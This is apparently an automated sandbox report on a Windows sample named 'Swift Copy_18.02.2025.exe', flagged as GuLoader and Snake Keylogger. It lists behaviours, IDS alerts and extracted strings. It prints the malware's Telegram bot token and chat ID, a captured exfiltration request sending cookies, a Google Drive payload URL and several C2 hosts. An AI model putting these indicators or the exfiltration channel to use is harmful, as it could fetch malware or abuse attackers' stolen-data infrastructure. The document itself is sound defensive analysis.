Edit tour

Windows Analysis Report
Swift Copy_18.02.2025.exe

Overview

General Information

Sample name:	Swift Copy_18.02.2025.exe
Analysis ID:	1618564
MD5:	4a1f527399836a20e0c648007bd75c4f
SHA1:	2155f638fc81a0ff83da6dbd57375ff7bb22d09e
SHA256:	151e5e6525dafef00671528a54c639918f7598b0d0b36fa2de0bc92db585e7b1
Tags:	exesignedSWIFTuser-cocaman
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious PE digital signature

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Swift Copy_18.02.2025.exe (PID: 7808 cmdline: "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe" MD5: 4A1F527399836A20E0C648007BD75C4F)

Swift Copy_18.02.2025.exe (PID: 7124 cmdline: "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe" MD5: 4A1F527399836A20E0C648007BD75C4F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY", "Chat_id": "8173633564", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.3916059325.0000000035EA5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2822262362.0000000004E4B000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000006.00000002.3877810810.00000000035FB000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Swift Copy_18.02.2025.exe PID: 7124	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Swift Copy_18.02.2025.exe PID: 7124	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T00:27:58.114371+0100	2803305	3	Unknown Traffic	192.168.2.8	49716	104.21.32.1	443	TCP
2025-02-19T00:28:01.795360+0100	2803305	3	Unknown Traffic	192.168.2.8	49722	104.21.32.1	443	TCP
2025-02-19T00:28:04.259420+0100	2803305	3	Unknown Traffic	192.168.2.8	49726	104.21.32.1	443	TCP
2025-02-19T00:28:05.453775+0100	2803305	3	Unknown Traffic	192.168.2.8	49728	104.21.32.1	443	TCP
2025-02-19T00:28:06.701581+0100	2803305	3	Unknown Traffic	192.168.2.8	49730	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T00:27:56.370293+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49714	158.101.44.242	80	TCP
2025-02-19T00:27:57.511002+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49714	158.101.44.242	80	TCP
2025-02-19T00:27:58.760973+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49717	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T00:27:52.024173+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49712	142.250.185.206	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T00:28:14.533139+0100	1810008	1	Potentially Bad Traffic	192.168.2.8	49732	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T00:28:07.631814+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49731	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendDocument?chat_id=8173633564&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd51106829459fHost: api.telegram.orgContent-Length: 1279

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 23:28:07 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Swift Copy_18.02.2025.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendDocument?chat_id=8173
Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/m
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.000000000572C000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2945047953.000000000572E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.000000000572C000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2945047953.000000000572E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/4U
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd&export=download
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd&export=downloadbX
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DEB000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E16000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F8E000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035EA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Code function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405295

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_0040331C
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		6_2_0040331C

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 0_2_00404AD2	0_2_00404AD2
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 0_2_004064F7	0_2_004064F7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_00404AD2	6_2_00404AD2
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_004064F7	6_2_004064F7
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AC478	6_2_055AC478
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AC748	6_2_055AC748
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AC148	6_2_055AC148
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055A7118	6_2_055A7118
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055A5380	6_2_055A5380
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AD288	6_2_055AD288
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055A9DE0	6_2_055A9DE0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055ACCE8	6_2_055ACCE8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055ACFB8	6_2_055ACFB8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AE988	6_2_055AE988
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055A69B0	6_2_055A69B0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055ACA18	6_2_055ACA18
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AD548	6_2_055AD548
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AC468	6_2_055AC468
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AC738	6_2_055AC738
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055A5370	6_2_055A5370
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AD278	6_2_055AD278
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055ACCD8	6_2_055ACCD8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055ACFA9	6_2_055ACFA9
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055A3E09	6_2_055A3E09
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AE97A	6_2_055AE97A
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055AF974	6_2_055AF974
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055A29EC	6_2_055A29EC
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055ACA08	6_2_055ACA08
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_055A3AA1	6_2_055A3AA1
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E71850	6_2_38E71850
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7CDC0	6_2_38E7CDC0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E75148	6_2_38E75148
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E72A90	6_2_38E72A90
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E79668	6_2_38E79668
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E71FA8	6_2_38E71FA8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E78CC0	6_2_38E78CC0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7F4C8	6_2_38E7F4C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7F4D8	6_2_38E7F4D8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E78CB1	6_2_38E78CB1
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7F080	6_2_38E7F080
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7F071	6_2_38E7F071
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E71841	6_2_38E71841
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E70040	6_2_38E70040
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7EC28	6_2_38E7EC28
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E70006	6_2_38E70006
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7EC18	6_2_38E7EC18
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7CDAF	6_2_38E7CDAF
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7F921	6_2_38E7F921
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7F930	6_2_38E7F930
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E79D38	6_2_38E79D38
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E75138	6_2_38E75138
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7DAC8	6_2_38E7DAC8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7DAB9	6_2_38E7DAB9
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E72A80	6_2_38E72A80
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7D660	6_2_38E7D660
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7D670	6_2_38E7D670
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_38E7D209	6_2_38E7D209
